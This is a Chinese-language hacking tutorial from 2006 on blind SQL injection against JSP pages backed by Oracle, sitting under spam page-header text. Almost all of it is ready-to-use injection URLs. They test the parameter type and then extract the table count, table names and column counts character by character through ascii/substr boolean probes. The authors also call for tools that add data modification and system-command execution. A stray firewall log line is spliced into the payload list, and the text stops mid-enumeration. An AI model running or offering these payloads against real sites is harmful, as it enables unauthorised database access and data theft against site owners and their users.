国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

JSP+ORACLE注入方法整理v1.0
2006-01-23   

大家好 ,我們是pt007和solaris7,QQ:7491805/564935,歡迎高手前來交流:)。
首先感謝華仔和他的朋友Hotkey為大家開發(fā)的cnsafersi 注入工具,沒有這個(gè)工具就沒有本文,HEHE,本文是對cnsafersi 注入工具抓包后所獲得的數(shù)據(jù)進(jìn)行了分析和整理,文章寫的比較倉促,有不足之處歡迎同行指正。另外希望有高手開發(fā)出功能更加強(qiáng)大的JSP注入程序,cnsafersi目前僅有select的功能,建議新的JSP注入工具中能加入insert/delete/update/backup/上傳/執(zhí)行系統(tǒng)命令等功能,可以參考NBSI的功能進(jìn)行開發(fā)。參考文章:《如何開發(fā)CnSaferSI》。

首先介紹本文中所使用的工具之JSP注入利器:華仔和他的朋友Hotkey開發(fā)的cnsafersi,關(guān)于使用方法近期我會寫一個(gè)詳細(xì)的使用教程:

下面以上圖中的AD表為例來說明JSP+ORACLE注入的過程:

1、 判斷注入類型(數(shù)字型還是字符型)
字符型和數(shù)字型數(shù)據(jù)判斷:(希望有人能進(jìn)一步的細(xì)化,細(xì)分為數(shù)字型和字符型判斷兩部分)

http://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And user<char(0)
 And user>char(0) And '1'='1
 And user<char(0) And '1'='1 
 And user>char(0) And '%25'=' 
 And user<char(0) And '%25'=' 
http://www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1 
http://www.test.net/index_kaoyan_view.jsp?id=117) And user<char(0) And 1 in(1 
) And user>char(0) And (' ')=(' 
) And user<char(0) And (' ')=(' 
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)<str(97)
 And str(98)>str(97) And '1'='1 
 And str(98)<str(97) And '1'='1 
 And str(98)>str(97) And '%25'=' 

 And user<char(0) And '%25'= 
 And str(98)<str(97) And '%25'=' 
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1 
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)<str(97) And 1 in(1 
) And str(98)>str(97) And (' ')=(' 
) And str(98)<str(97) And (' ')=('

出現(xiàn)正常的頁面:
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER<CHR(0)
2、 猜解表數(shù)量和表名

數(shù)據(jù)庫數(shù)量為3:

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

以下為猜解數(shù)據(jù)表數(shù)量
數(shù)據(jù)表第一位為:1

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))


數(shù)據(jù)表第二位為:3

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

數(shù)據(jù)表第三位為:1
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))


共有131個(gè)數(shù)據(jù)表,見上圖。

以下為猜解表名稱:
以下為判斷第一個(gè)表的長度為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)


以下為判斷第一個(gè)表的第一位值為:A

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))


以下為判斷第一個(gè)表AD的第二位值為:D

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))


以下為判斷第二個(gè)表的表ADER的表名長度為:4

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)


以下為判斷第二個(gè)表ADER第一位的值為:A

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))


以下為判斷第二個(gè)表ADER第二位的值為:D
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))


以下為判斷第二個(gè)表ADER第三位的值為:E
http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))


以下為判斷第二個(gè)表ADER第四位的值為:R

http://www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

以下為判斷第三個(gè)表的表名長度為:

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)


3、 猜解列名長度和列名:
a) 以下為猜解字段長度為:2位

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)


 列名長度為:10位以上
以下猜解列名的長度的第一位為:1(十位)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))


以下猜解列名長度的第二位為:0(個(gè)位)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
Informational 10/12/2005 15:03:25 Suspect event: ICMP Time Exceeded (> 1 for 1 seconds)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
